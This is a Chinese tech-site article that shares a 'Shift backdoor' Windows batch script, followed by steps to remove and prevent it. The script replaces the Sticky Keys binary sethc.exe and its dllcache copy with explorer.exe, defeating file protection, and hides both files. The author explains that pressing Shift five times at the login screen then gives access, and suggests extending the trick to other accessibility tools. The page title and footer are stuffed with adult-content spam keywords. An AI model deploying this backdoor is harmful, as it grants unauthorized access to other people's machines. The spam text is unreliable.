精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 入侵防御 查看內(nèi)容

shift后門批處理代碼與shift后門清除方法分享

2022-9-26 13:03| 查看: 2428 |來源: 互聯(lián)網(wǎng)

在cmd下輸入以下命令... 下面再打開記事本把底下的代碼粘貼進(jìn)去。 代碼如下: @echo off cls echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo. echo Shift后門 echo.spro
在cmd下輸入以下命令...
下面再打開記事本把底下的代碼粘貼進(jìn)去。

代碼如下:
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后門
echo.sproink
@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
echo 使用方法:本文件執(zhí)行完畢后,
echo 在終端界面按Shift 5次即可登陸系統(tǒng)!
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后門安裝完畢!
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

其實(shí)原理很簡單,就是利用了explorer.exe 這個(gè)資源管理器進(jìn)程替換調(diào)用的shift 默認(rèn)啟動(dòng)程序,然后還覆蓋了windows的文件保護(hù)原文件(防止文件保護(hù)系統(tǒng)檢測到文件修改,會(huì)還原這些原來的程序,造成copy文件失去作用),當(dāng)調(diào)用shift是其實(shí)調(diào)用的真正程序是桌面進(jìn)程。Lyon: 同理,你也可以利用此方法替換屏幕鍵盤及放大鏡和組合鍵:win+u,其它自己可以拓展思路^_^
下面介紹如何清除此后門...
打開控制面板--輔助功能選項(xiàng)--粘滯鍵--設(shè)置--去掉使用快捷鍵的勾

還有要改下copy.exe的權(quán)限,不過在這里推薦大家把c盤所有的程序都 改下,只有administrator才能訪問

shift后門的預(yù)防解決辦法:預(yù)防很簡單的,連敲5次shift,然后在彈出的設(shè)置里面取消連滯鍵
已經(jīng)中了的話
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷貝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目錄下;拷貝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目錄下
還有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用戶權(quán)限或拒絕訪問等,也可:)建議利用前者恢復(fù)。。。
收工!
本文最后更新于 2022-9-26 13:03,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請?jiān)诰W(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號(hào):w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時(shí)修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 在线亚洲国产精品区 | 日韩一区二区免费看 | 久青草国产在线视频_久青草免 | 免费看黄色毛片 | 最刺激黄a大片免费观看 | 九九爱国产 | 国产色网址 | 精品综合久久久久久97超人该 | 精品中文字幕不卡在线视频 | 97国产大学生情侣11在线视频 | 色综合久久中文 | 日韩一区二区三区在线播放 | 欧美亚洲国产成人精品 | 国产成人精品日本亚洲11 | 欧美成人乱弄视频 | 好吊妞gao988在线播放 | 99国产精品热久久久久久夜夜嗨 | 久久99精品久久久久久国产越南 | 91福利一区二区三区 | 亚洲国产日韩a在线播放 | 一级片日韩 | 尤物精品视频在线观看 | 欧美成人性色xxxx视频 | 精品一区二区影院在线 | 久久综合一区二区 | 日韩欧美毛片免费看播放 | 成人午夜兔费观看网站 | 国产高清视频免费最新在线 | 综合欧美日韩一区二区三区 | 午夜91| 国产三级欧美 | 美色阁亚洲91网站在线观看 | 免费观看黄色a一级录像 | 在线影片 | 久久久久久久久久久9精品视频 | 国产精品99在线观看 | 又黄又爽的视频 | 久久福利资源网站免费看 | 精品一本久久中文字幕 | 久久噜国产精品拍拍拍拍 | 一区视频在线 |